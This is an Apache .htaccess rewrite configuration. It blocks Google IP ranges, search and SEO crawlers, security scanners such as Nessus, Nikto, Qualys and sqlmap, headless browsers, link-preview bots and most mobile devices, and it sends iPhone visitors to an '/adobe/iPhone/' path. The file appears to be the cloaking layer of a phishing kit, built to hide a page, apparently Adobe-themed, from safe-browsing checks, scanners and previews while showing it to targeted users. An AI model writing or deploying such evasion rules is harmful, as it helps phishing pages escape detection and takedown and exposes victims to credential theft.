# ----------------------------------------------------------------------
# 1. INITIALIZE REWRITE ENGINE
# ----------------------------------------------------------------------
<IfModule mod_rewrite.c>
    RewriteEngine On

    # ----------------------------------------------------------------------
    # 2. WHITELISTING
    # ----------------------------------------------------------------------
    RewriteCond %{REQUEST_URI} ^/adobe/iPhone [NC]
    RewriteRule .* - [L]

    # ----------------------------------------------------------------------
    # 3. BLOCK GOOGLE IP RANGES
    # ----------------------------------------------------------------------
    RewriteCond %{REMOTE_ADDR} ^172\.253\.234\.208$ [OR]
    RewriteCond %{REMOTE_ADDR} ^172\.253\.234\.223$ [OR]
    RewriteCond %{REMOTE_ADDR} ^172\.253\.192\.126$ [OR]
    RewriteCond %{REMOTE_ADDR} ^172\.253\.192\.123$ [OR]
    RewriteCond %{REMOTE_ADDR} ^172\.253\.216\.59$ [OR]
    RewriteCond %{REMOTE_ADDR} ^173\.194\.92\.180$ [OR]
    RewriteCond %{REMOTE_ADDR} ^66\.249\.64\. [OR]
    RewriteCond %{REMOTE_ADDR} ^66\.249\.65\. [OR]
    RewriteCond %{REMOTE_ADDR} ^66\.249\.66\. [OR]
    RewriteCond %{REMOTE_ADDR} ^66\.249\.67\. [OR]
    RewriteCond %{REMOTE_ADDR} ^66\.249\.68\. [OR]
    RewriteCond %{REMOTE_ADDR} ^66\.249\.69\. [OR]
    RewriteCond %{REMOTE_ADDR} ^66\.249\.70\. [OR]
    RewriteCond %{REMOTE_ADDR} ^66\.249\.71\. [OR]
    RewriteCond %{REMOTE_ADDR} ^66\.249\.72\. [OR]
    RewriteCond %{REMOTE_ADDR} ^66\.249\.73\. [OR]
    RewriteCond %{REMOTE_ADDR} ^66\.249\.74\. [OR]
    RewriteCond %{REMOTE_ADDR} ^66\.249\.75\. [OR]
    RewriteCond %{REMOTE_ADDR} ^66\.249\.76\. [OR]
    RewriteCond %{REMOTE_ADDR} ^66\.249\.77\. [OR]
    RewriteCond %{REMOTE_ADDR} ^66\.249\.78\. [OR]
    RewriteCond %{REMOTE_ADDR} ^66\.249\.79\.
    RewriteRule .* - [F,L]

    # ----------------------------------------------------------------------
    # 4. BLOCK COMPREHENSIVE BOT LIST (User-Agents)
    # ----------------------------------------------------------------------
    RewriteCond %{HTTP_USER_AGENT} (googlebot|bingbot|yandexbot|baiduspider|slurp|duckduckbot|sogou|exabot|ia_archiver|facebot|facebookexternalhit) [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} (ahrefs|semrush|majestic|mj12bot|rogerbot|dotbot|screaming|linkdex) [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} (nessus|nikto|acunetix|qualys|nmap|sqlmap|nuclei|wpscan) [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} (bot|spider|crawler|archiver|curl|wget|python) [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} (headless|puppeteer|selenium|phantomjs|chromeheadless|cypress|playwright) [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} (twitterbot|linkedinbot|pinterest|slackbot|telegrambot|whatsapp|discordbot) [NC]
    RewriteRule .* - [F,L]

    # ----------------------------------------------------------------------
    # 5. BLOCK EMPTY USER AGENTS & SPAM REFERRERS
    # ----------------------------------------------------------------------
    RewriteCond %{HTTP_USER_AGENT} ^$ [OR]
    RewriteCond %{HTTP_REFERER} (semrush|ahrefs|moz\.com) [NC]
    RewriteRule .* - [F,L]

    # ----------------------------------------------------------------------
    # 6. IPHONE REDIRECT
    # ----------------------------------------------------------------------
    RewriteCond %{HTTP_USER_AGENT} iPhone [NC]
    RewriteRule .* /adobe/iPhone/ [R=302,L]

    # ----------------------------------------------------------------------
    # 7. BLOCK OTHER MOBILE DEVICES
    # ----------------------------------------------------------------------
    RewriteCond %{HTTP_USER_AGENT} (Android|iPad|iPod|BlackBerry|Opera\ Mini|IEMobile|Windows\ Phone|webOS|Mobile|Tablet|Kindle|Silk) [NC]
    RewriteRule .* - [F,L]

    # ----------------------------------------------------------------------
    # 8. HIDE .PHP EXTENSION (Clean URLs)
    # Allows index.php to be accessed as /index
    # ----------------------------------------------------------------------
    # Remove .php from visible URL via redirection
    RewriteCond %{THE_REQUEST} ^[A-Z]{3,}\s([^.]+)\.php [NC]
    RewriteRule ^ %1 [R=301,L]

    # Internally point the clean URL back to the .php file
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteCond %{REQUEST_FILENAME}.php -f
    RewriteRule ^(.*?)/?$ $1.php [NC,L]

</IfModule>

ErrorDocument 403 "Access Restricted"